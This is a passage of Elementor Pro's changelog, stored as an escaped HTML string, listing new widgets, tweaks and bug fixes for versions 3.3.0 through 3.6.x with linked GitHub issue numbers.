href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18069\\\">#18069<\\/a>)<\\/li>\\n<li>Fix: When saving Global widget JS error is being thrown and editor fails to load (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17954\\\">#17954<\\/a>)<\\/li>\\n<li>Fix: Motion effects are missing from Background section under Style tab in Container element (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18063\\\">#18063<\\/a>)<\\/li>\\n<li>Fix: Imported Kit doesn\'t appear in the theme builder after successful import in some cases<\\/li>\\n<li>Fix: Added future Pro support to fix the Cart icon that shifted aside in Menu cart widget<\\/li>\\n<\\/ul>\\n<h4>3.6.3 - 2022-02-28<\\/h4>\\n<ul>\\n<li>Fix: Custom Code display conditions modal is not working (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17865\\\">#17865<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17942\\\">#17942<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17994\\\">#17994<\\/a>)<\\/li>\\n<li>Fix: Share buttons are not accessible for keyboard navigation (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8615\\\">#8615<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.6.2 - 2022-02-14<\\/h4>\\n<ul>\\n<li>Fix: Auto updates mechanism is not working as expected (this version might be also installed automatically)<\\/li>\\n<\\/ul>\\n<h4>3.6.1 - 2022-02-09<\\/h4>\\n<ul>\\n<li>Tweak: Allow connecting via generic source for future feature support<\\/li>\\n<li>Fix: Custom Code doesn\'t work when WooCommerce is active (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17675\\\">#17675<\\/a>)<\\/li>\\n<li>Fix: Content animation didn\'t work when Improved asset loading experiment is active Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17055\\\">#17055<\\/a>)<\\/li>\\n<li>Fix: PHP warning appears some times when trying to force-check for available updates<\\/li>\\n<li>Fix: Page transitions are being triggered when not needed<\\/li>\\n<li>Fix: Text alignment on Tablet responsive device affects base device in Testimonial Carousel widget<\\/li>\\n<li>Fix: Harden Submissions feature to prevent potential security issues<\\/li>\\n<li>Fix: Page Transitions Icon option Preloader doesn\'t work on frontend<\\/li>\\n<\\/ul>\\n<h4>3.6.0 - 2022-01-31<\\/h4>\\n<ul>\\n<li>New: WooCommerce Purchase Summary widget - Fully customize the content and style of your order summary page (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5756\\\">#5756<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15862\\\">#15862<\\/a>)<\\/li>\\n<li>New: WooCommerce Notices styling on Site Settings - Customize the appearance of WooCommerce notices (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14570\\\">#14570<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15896\\\">#15896<\\/a>)<\\/li>\\n<li>New: WooCommerce Notices widget - Set the position of WooCommerce notices on your shop pages (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8124\\\">#8124<\\/a>)<\\/li>\\n<li>Experiment: Page Transitions - Customize the page loading experience, and increase brand recognition (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10576\\\">#10576<\\/a>)<\\/li>\\n<li>Tweak: Added WooCommerce & Theme Elements widgets to Improved CSS Loading experiment to save up 126KB per page load (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17412\\\">#17412<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17337\\\">#17337<\\/a>)<\\/li>\\n<li>Tweak: Added new layout options in WooCommerce Add To Cart and WooCommerce Custom Add To Cart widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5437\\\">#5437<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10617\\\">#10617<\\/a>)<\\/li>\\n<li>Tweak: Added Stroke functionality for typography control in various widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11158\\\">#11158<\\/a>)<\\/li>\\n<li>Tweak: Removed <code>elementor-section-wrap<\\/code> by adding it to the Optimized DOM Output experiment (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16950\\\">#16950<\\/a>)<\\/li>\\n<li>Tweak: Added style controls for variations in WooCommerce Menu Cart widget<\\/li>\\n<li>Tweak: Added color control to navigation dots in Media Carousel, Reviews, and Slides widgets<\\/li>\\n<li>Tweak: Disabled Vimeo autoplay on edit mode when getting video data in Video Playlist widget<\\/li>\\n<li>Tweak: Added notice about Facebook\'s new EU consent policy in Facebook Button, Facebook Comments, Facebook Embed, and Facebook Page widgets<\\/li>\\n<li>Tweak: Refactor string translation calls to use native WP translation methods<\\/li>\\n<li>Tweak: Convert <code>home_url<\\/code> license API call to <code>get_site_url<\\/code> for better compatibility<\\/li>\\n<li>Tweak: Promoted Default to New Theme Builder and Scroll Snap experiments to Stable status in Experiments screen<\\/li>\\n<li>Tweak: Scroll Snap experiment set to active by default for all websites in Experiments screen<\\/li>\\n<li>Tweak: Scrolling Effects in Header and Section backgrounds are not working as expected when effects are relative to the entire page<\\/li>\\n<li>Tweak: Added "Auto Updates" capability to Pro versions<\\/li>\\n<li>Tweak: Removed sequenced animation hover effect option from Classic skin in Call to Action widget<\\/li>\\n<li>Tweak: Added "Excerpt Length" control in Post Excerpt widget<\\/li>\\n<li>Tweak: Deleted deprecated methods from Query Control module<\\/li>\\n<li>Tweak: Adjusted Inline-CSS Experiment to work with Additional Custom Breakpoints experiment<\\/li>\\n<li>Fix: Automatically open cart functionality didn\'t work in product page in WooCommerce Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5921\\\">#5921<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16276\\\">#16276<\\/a>,<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16879\\\">#16879<\\/a>)<\\/li>\\n<li>Fix: Buttons are not visible when there are too many products in the cart in WooCommerce Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16221\\\">#16221<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17283\\\">#17283<\\/a>,<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16333\\\">#16333<\\/a>,<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13005\\\">#13005<\\/a>)<\\/li>\\n<li>Fix: Mini cart modal z-index is too low in WooCommerce Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16333\\\">#16333<\\/a>)<\\/li>\\n<li>Fix: Side cart buttons are not visible at first glance on mobile in WooCommerce Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16221\\\">#16221<\\/a>)<\\/li>\\n<li>Fix: Read More field recognizes inline HTML elements as plain text in Posts and Archive Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16985\\\">#16985<\\/a>)<\\/li>\\n<li>Fix: Load More functionality caused JS error console in Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17036\\\">#17036<\\/a>)<\\/li>\\n<li>Fix: Autoplay is not working as expected when the lazy load is active in Video Playlist widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15304\\\">#15304<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16274\\\">#16274<\\/a>)<\\/li>\\n<li>Fix: Right navigation area wasn\'t 100% clickable in Post Navigation widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14252\\\">#14252<\\/a>)<\\/li>\\n<li>Fix: Posts duplicate when there are two Posts widgets inside a page using pagination functionality (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17056\\\">#17056<\\/a>)<\\/li>\\n<li>Fix: Global widget changes are not reflected on frontend (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16820\\\">#16820<\\/a>)<\\/li>\\n<li>Fix: JS Error console message when using the Load More functionality and Post Per Page option in Posts widget<\\/li>\\n<li>Fix: Heading styling is not being loaded when Inline CSS experiment is active in Post and Page Title widgets<\\/li>\\n<li>Fix: Sticky offset not working as expected when changing device mode on the browser<\\/li>\\n<li>Fix: Scroll Snap functionality wasn\'t applied on Templates and Archives<\\/li>\\n<li>Fix: Toggle icon color didn\'t work on hover state when Inline Font Icons experiment is activated in Nav Menu widget<\\/li>\\n<li>Fix: Variations style controls are not working as expected in WooCommerce Add to Cart widget<\\/li>\\n<li>Fix: Display conditions module is not working as expected when using the new Theme Builder UI<\\/li>\\n<li>Fix: Edit header handles <code>z-index<\\/code> issues in Header document<\\/li>\\n<li>Fix: Panel icons UI glitch in Call To Action widget<\\/li>\\n<li>Fix: WordPress 5.9 <code>WP_User_query<\\/code> <code>who<\\/code> argument deprecation adjustments<\\/li>\\n<\\/ul>\\n<h4>3.5.2 - 2021-11-28<\\/h4>\\n<ul>\\n<li>Tweak: Adjusted license mechanism to support trial period<\\/li>\\n<li>Fix: Updates made to Global Widgets do not reflect accordingly to linked widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16815\\\">#16815<\\/a>)<\\/li>\\n<li>Fix: Hamburger toggle button doesn\'t change to \\u201cclose\\u201d when menu is collapsed in Nav Menu widget when Inline Font Awesome experiment is active<\\/li>\\n<li>Fix: Global Widget cannot be unlinked<\\/li>\\n<\\/ul>\\n<h4>3.5.1 - 2021-11-10<\\/h4>\\n<ul>\\n<li>Fix: Inline HTML elements appear as plain text in Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16816\\\">#16816<\\/a>)<\\/li>\\n<li>Fix: Dropdown items inherited values from Main Menu space between control in Nav Menu widget (<a href=\\\"(https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16815)\\\">#16815<\\/a><\\/li>\\n<li>Fix: Order Summary titles style controls not applying on various devices in Cart widget<\\/li>\\n<li>Fix: Panel "Need Help" link is not correct in WooCommerce section in Site Settings<\\/li>\\n<\\/ul>\\n<h4>3.5.0 - 2021-11-01<\\/h4>\\n<ul>\\n<li>New: WooCommerce Checkout widget - Fully customize the content and style of your checkout page (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15282\\\">#15282<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15990\\\">#15990<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11014\\\">#11014<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13218\\\">#13218<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5383\\\">#5383<\\/a>)<\\/li>\\n<li>New: WooCommerce Cart widget - Style your cart page the way you want with design flexibility (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15282\\\">#15282<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11014\\\">#11014<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13218\\\">#13218<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5383\\\">#5383<\\/a>)<\\/li>\\n<li>New: WooCommerce My Account widget - Create a custom design for your my account pages (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11014\\\">#11014<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5383\\\">#5383<\\/a>)<\\/li>\\n<li>New: Progress Tracker widget - Motivate your customers to keep reading your site content (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16576\\\">#16576<\\/a>)<\\/li>\\n<li>New: Meet WooCommerce Site Settings - Set your store pages within Elementor<\\/li>\\n<li>Experiment: Scroll Snap - Set the scene of every scroll (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10752\\\">#10752<\\/a>)<\\/li>\\n<li>Tweak: Changed infrastructure to prevent rendering bugs in Global Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16354\\\">#16354<\\/a>)<\\/li>\\n<li>Tweak: Added the option to open submission in a new tab in Form Submissions (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14967\\\">#14967<\\/a>)<\\/li>\\n<li>Tweak: Added various responsive controls in Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1851\\\">#1851<\\/a>)<\\/li>\\n<li>Tweak: Split Title and Price styling controls in Price List widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7688\\\">#7688<\\/a>)<\\/li>\\n<li>Tweak: Added various responsive capabilities to controls in Posts Archive widget<\\/li>\\n<li>Tweak: Adjusted Motion Effects module to support future feature<\\/li>\\n<li>Tweak: Changed admin notice content when Pro installed without Core installed<\\/li>\\n<li>Tweak: Cleanup in <code>wp_options<\\/code> table<\\/li>\\n<li>Tweak: Changed Connect logic in Elementor top bar to simplify the connect process<\\/li>\\n<li>Tweak: Marked new Theme Builder as an Experiment and set to default for new sites<\\/li>\\n<li>Tweak: Enforced better security policies in various widgets and modules<\\/li>\\n<li>Tweak: Added load more button functionality to the Posts Archive widget<\\/li>\\n<li>Tweak: Renamed Elementor\'s responsive SCSS variables<\\/li>\\n<li>Tweak: Added dividers to horizontal layout in Nav Menu widget<\\/li>\\n<li>Tweak: Removed Google+ social network from Share Buttons widget<\\/li>\\n<li>Tweak: Convert usage of old Responsive class to use the new Breakpoints Manager<\\/li>\\n<li>Fix: jQuery in Heading doesn\'t work for not logged in users in Custom Code (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14515\\\">#14515<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14266\\\">#14266<\\/a>)<\\/li>\\n<li>Fix: Menu animation causing page horizontal scroll in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15184\\\">#15184<\\/a>)<\\/li>\\n<li>Fix: Wrong function call in Table of Content & Post Excerpt widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16547\\\">#16547<\\/a>)<\\/li>\\n<li>Fix: Slides to Scroll control can\'t be set to Default if Widescreen mode has a value in Testimonial Carousel widget<\\/li>\\n<li>Fix: Sticky offset not working properly when changing device mode<\\/li>\\n<li>Fix: UTF character issues when exporting CSV file in Form Submissions<\\/li>\\n<li>Fix: Load More functionality doesn\'t work when the Posts widget placed inside an Archive template<\\/li>\\n<li>Fix: UI glitches and editing issues in Video Playlist widget<\\/li>\\n<\\/ul>\\n<h4>3.4.2 - 2021-10-12<\\/h4>\\n<ul>\\n<li>Fix: Icons color style conflicts when Font-Awesome Inline experiment is active in Share Buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16435\\\">#16435<\\/a>)<\\/li>\\n<li>Fix: Mini Cart hides page content when closed in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16305\\\">#16305<\\/a>)<\\/li>\\n<li>Fix: UI glitches in the Editor edit mode when inserting Post Content widget and Font-Awesome Inline experiment is active in Single Post template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16358\\\">#16358<\\/a>)<\\/li>\\n<li>Fix: Slides per view controls disappeared from multiple breakpoints in Testimonial Carousel<\\/li>\\n<li>Fix: Product variations UI glitch in Menu Cart widget<\\/li>\\n<li>Fix: Buttons UI glitch on Safari browser in Menu Cart widget<\\/li>\\n<\\/ul>\\n<h4>3.4.1 - 2021-09-01<\\/h4>\\n<ul>\\n<li>Fix: Sticky functionality is not working if the Additional Custom Breakpoints experiment is active (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16186\\\">#16186<\\/a>)<\\/li>\\n<li>Fix: Slideshow skin UI glitch in Media Carousel widget<\\/li>\\n<li>Fix: Product price typography weight control is not working as expected in Menu Cart widget<\\/li>\\n<\\/ul>\\n<h4>3.4.0 - 2021-09-01<\\/h4>\\n<ul>\\n<li>Tweak: Added new Mini Cart layout type in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11312\\\">#11312<\\/a>)<\\/li>\\n<li>Tweak: Added styling options for Cart, Products, and Cart buttons in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14952\\\">#14952<\\/a>)<\\/li>\\n<li>Tweak: Added the ability to open cart automatically when an item is added in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14119\\\">#14119<\\/a>)<\\/li>\\n<li>Tweak: Added the ability to remove an item from cart without reloading the page with an AJAX request (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9531\\\">#9531<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10875\\\">#10875<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11309\\\">#11309<\\/a>)<\\/li>\\n<li>Tweak: Added Load More AJAX functionality to Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12126\\\">#12126<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1284\\\">#1284<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14557\\\">#14557<\\/a>)<\\/li>\\n<li>Tweak: Added Vimeo support to the Video Playlist widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15319\\\">#15319<\\/a>)<\\/li>\\n<li>Tweak: Improved asset loading performance by serving lighter JS files (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8572\\\">#8572<\\/a>)<\\/li>\\n<li>Tweak: Added query string to the URL only after the first video is played in Video Playlist widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15348\\\">#15348<\\/a>)<\\/li>\\n<li>Tweak: Added various layout options with more responsive controls and cart structure options in Menu Cart widget<\\/li>\\n<li>Tweak: Added the option to open the menu cart by click or hover in Menu Cart widget<\\/li>\\n<li>Tweak: Added the ability to choose a specific product to draw data from in WooCommerce Dynamic tags<\\/li>\\n<li>Tweak: Removed auto-scroll to the widget location when arriving from external URL in Video Playlist widget<\\/li>\\n<li>Tweak: Removed the Video Playlist widget from the Experiments list<\\/li>\\n<li>Tweak: Added descriptive error messages for MailChimp action after submit and on form submit in Forms widget<\\/li>\\n<li>Tweak: Added tooltip trigger None and Hover for link in Hotspot widget<\\/li>\\n<li>Tweak: Added responsive controls to Offset and Effects Offset in Sticky options<\\/li>\\n<li>Tweak: Added responsive control to Alignment in Testimonial Carousel widget<\\/li>\\n<li>Tweak: Adjusted Motion Effects module to support future feature<\\/li>\\n<li>Tweak: Added future compatibility to support better loading of <code>eicons<\\/code> font<\\/li>\\n<li>Tweak: Changed Rename Part title and button color in Theme Builder<\\/li>\\n<li>Fix: Products don\'t appear on the cart while editing in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15451\\\">#15451<\\/a>)<\\/li>\\n<li>Fix: Videos always start muted in the Video Playlist widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15292\\\">#15292<\\/a>)<\\/li>\\n<li>Fix: Unnecessary spacing if submenu indicator is set to None in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15365\\\">#15365<\\/a>)<\\/li>\\n<li>Fix: MailChimp double opt-in feature doesn\'t work in Forms widget<\\/li>\\n<li>Fix: Fetching MailChimp groups field blocks the loading of the rest of the fields in the Form widget<\\/li>\\n<li>Fix: Missing field IDs causes forms not to be sent in Forms widget<\\/li>\\n<li>Fix: Full Content Skin is not working properly when inserted twice on the same page in Posts widget<\\/li>\\n<li>Fix: Avoid Duplicates option doesn\'t exclude manual selections in Posts widget<\\/li>\\n<li>Fix: Submenu indicator alignment issue in Nav menu widget<\\/li>\\n<li>Fix: Query control deprecated message appears when debug mode is defined<\\/li>\\n<li>Fix: Tweet Button icon incorrect color and size when the icon is rendered as SVG in Blockquote widget<\\/li>\\n<li>Fix: Video icon size is not changing on Active state in Video Playlist widget<\\/li>\\n<li>Fix: Header icon color is not working in Table Of Content widget<\\/li>\\n<li>Fix: Icons style glitches when Font Awesome Inline experiment is active in Video Playlist widget<\\/li>\\n<li>Fix: Bullet markers are not visible on preview mode when Font Awesome Inline experiment is active in Table of Content widget<\\/li>\\n<li>Fix: UI Glitch when Font-Awesome Inline experiment is active in Price Table widget<\\/li>\\n<li>Fix: Submenu Indicator appears larger when Font Awesome Inline experiment is active in Nav Menu widget<\\/li>\\n<li>Fix: Part name is deleted when clicking on the "Change" Button without changing the name in Theme Builder<\\/li>\\n<li>Fix: Redundant pagination queries in the Editor<\\/li>\\n<li>Deprecated: Remove all usages of <code>ElementorUtils::get_create_new_post_url()<\\/code><\\/li>\\n<li>Deprecated: See all deprecations to this version in our <a href=\\\"https:\\/\\/developers.elementor.com\\/v3-4-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a><\\/li>\\n<\\/ul>\\n<h4>3.3.8 - 2021-08-23<\\/h4>\\n<ul>\\n<li>Fix: Products grid width issue when adjusting columns and rows in Products widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16001\\\">#16001<\\/a>)<\\/li>\\n<li>Fix: Font Awesome Inline experiment causes icons glitch in Price Table widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16045\\\">#16045<\\/a>)<\\/li>\\n<li>Fix: reCAPTCHA v3 <code>z-index<\\/code> is lower than the Section\'s background color<\\/li>\\n<li>Fix: Style missing when Font Awesome inline experiment is active in Post Info widget<\\/li>\\n<li>Fix: Font Awesome icons were not loaded in Post Info widget<\\/li>\\n<li>Fix: Zero character can\'t be used as a placeholder in Number field in Form widget<\\/li>\\n<li>Fix: Carousels are not working properly in the Editor when Additional Custom Breakpoints experiment is active<\\/li>\\n<\\/ul>\\n<h4>3.3.7 - 2021-08-15<\\/h4>\\n<ul>\\n<li>Tweak: Added support for Additional Custom Breakpoints in Nav Menu widget<\\/li>\\n<li>Tweak: Added support for Additional Custom breakpoints in Motion Effects<\\/li>\\n<li>Fix: Columns didn\'t respond to changes in Gallery widget if Additional Custom Breakpoints Experiment is active<\\/li>\\n<\\/ul>\\n<h4>3.3.6 - 2021-08-10<\\/h4>\\n<ul>\\n<li>Tweak: Added support for future feature in Nav Menu widget<\\/li>\\n<li>Fix: WooCommerce responsive grid styles are not being reflected in Product Related widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15857\\\">#15857<\\/a>)<\\/li>\\n<li>Fix: WooCommerce responsive grid styles are not being reflected in Upsells widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15857\\\">#15857<\\/a>)<\\/li>\\n<li>Fix: WooCommerce responsive grid styles are not being reflected in Product Categories widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15857\\\">#15857<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.3.5 - 2021-08-01<\\/h4>\\n<ul>\\n<li>Fix: Responsive layout glitches in Products and Products Archive widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15773\\\">#15773<\\/a>)<\\/li>\\n<li>Fix: reCAPTCHA V3 integration conflict with required fields validation in Forms widget<\\/li>\\n<\\/ul>\\n<h4>3.3.4 - 2021-07-21<\\/h4>\\n<ul>\\n<li>Fix: Grid layout glitch in WooCommerce Products Archive widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15718\\\">#15718<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.3.3 - 2021-07-20<\\/h4>\\n<ul>\\n<li>Tweak: Added a descriptive message in Collect Submissions action after submit<\\/li>\\n<li>Tweak: Added future compatibility for Additional Custom Breakpoints for Pro widgets<\\/li>\\n<li>Fix: Some widget style breaks when Improved CSS Loading Experiment is active in certain cases (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15632\\\">#15632<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15683\\\">#15683<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15660\\\">#15660<\\/a>)<\\/li>\\n<li>Fix: Translation update keep appearing as available after install (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14297\\\">#14297<\\/a>)<\\/li>\\n<li>Fix: Wrong default icon color when using Font Awesome icons as inline SVG in Call to Action widget<\\/li>\\n<\\/ul>\\n<h4>3.3.2 - 2021-07-13<\\/h4>\\n<ul>\\n<li>Tweak: Updated plugin description<\\/li>\\n<li>Fix: MailChimp tags in form widget replaced existing tags (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11111\\\">#11111<\\/a>)<\\/li>\\n<li>Fix: Clicking videos from the items list in edit mode doesn\\u2019t initiate videos properly<\\/li>\\n<li>Fix: User unauthorized message when activated but not connected in Kit Library<\\/li>\\n<li>Fix: Carousel widgets did not support additional custom breakpoint responsive values<\\/li>\\n<li>Fix: Tab border is overridden by the Section background color in Video Playlist widget<\\/li>\\n<li>Fix: Widgets style breaks when Improved CSS Load experiment is active in a Single Page template and Post Content widget<\\/li>\\n<\\/ul>\\n<h4>3.3.1 - 2021-06-20<\\/h4>\\n<ul>\\n<li>Tweak: Added support for more Theme Builder display conditions in Export \\/ Import experiment<\\/li>\\n<li>Tweak: Adjusted License page heading structure for future feature<\\/li>\\n<li>Tweak: Adjusted Font Awesome icon for allowing support for future feature<\\/li>\\n<li>Fix: <code>frontend.min.js<\\/code> file size increased in Elementor Pro 3.3.0 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15278\\\">#15278<\\/a>)<\\/li>\\n<li>Fix: Prevent conditions from being reset when object cache is enabled in site (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13299\\\">#13299<\\/a>)<\\/li>\\n<li>Fix: Custom Code publish modal responsiveness issues (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14519\\\">#14519<\\/a>)<\\/li>\\n<li>Fix: Populating fields with options programmatically doesn\'t appear in Submissions screen (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10671\\\">#10671<\\/a>)<\\/li>\\n<li>Fix: Large images are not shown on the Image Carousel widget when set via Toolset dynamic tag<\\/li>\\n<li>Fix: Enable inline editing to the inner content tabs in Video Playlist widget<\\/li>\\n<li>Fix: Clicking on the video list doesn\'t play videos properly in Video Playlist widget<\\/li>\\n<li>Fix: Hide Play Icon control when Image overlay is toggled off in Video Playlist widget<\\/li>\\n<li>Fix: Removed extra space below the player when viewing from mobile view in Video Playlist widget<\\/li>\\n<li>Fix: Import button is not working properly in Theme Builder interface<\\/li>\\n<li>Fix: Preview Dynamic Content as control is not updating preview and throws an error in Popup Builder<\\/li>\\n<\\/ul>\\n<h4>3.3.0 - 2021-06-08<\\/h4>\\n<ul>\\n<li>New: Video Playlist widget - Add Engaging Video Content to Your Website (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11859\\\">#11859<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7803\\\">#7803<\\/a>)<\\/li>\\n<li>New: Hotspot widget - Create Interactive Images With Contextually Relevant Information (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7282\\\">#7282<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2768\\\">#2768<\\/a>)<\\/li>\\n<li>Tweak: Accessibility improvements for sub-menus in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13859\\\">#13859<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13810\\\">#13810<\\/a>)<\\/li>\\n<li>Tweak: MailChimp action after submit can now add new tags to existing subscribers in Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11111\\\">#11111<\\/a>)<\\/li>\\n<li>Tweak: Added <code>elementor_pro\\/forms\\/record\\/actions_before<\\/code> to filter the record before it sent to Actions After Submit in Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14261\\\">#14261<\\/a>)<\\/li>\\n<li>Tweak: Yoast SEO breadcrumbs widget can be used in Elementor without the need of enabling them in Yoast setting<\\/li>\\n<li>Tweak: Added future support for widgets CSS conditional loading (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10329\\\">#10329<\\/a>, <a 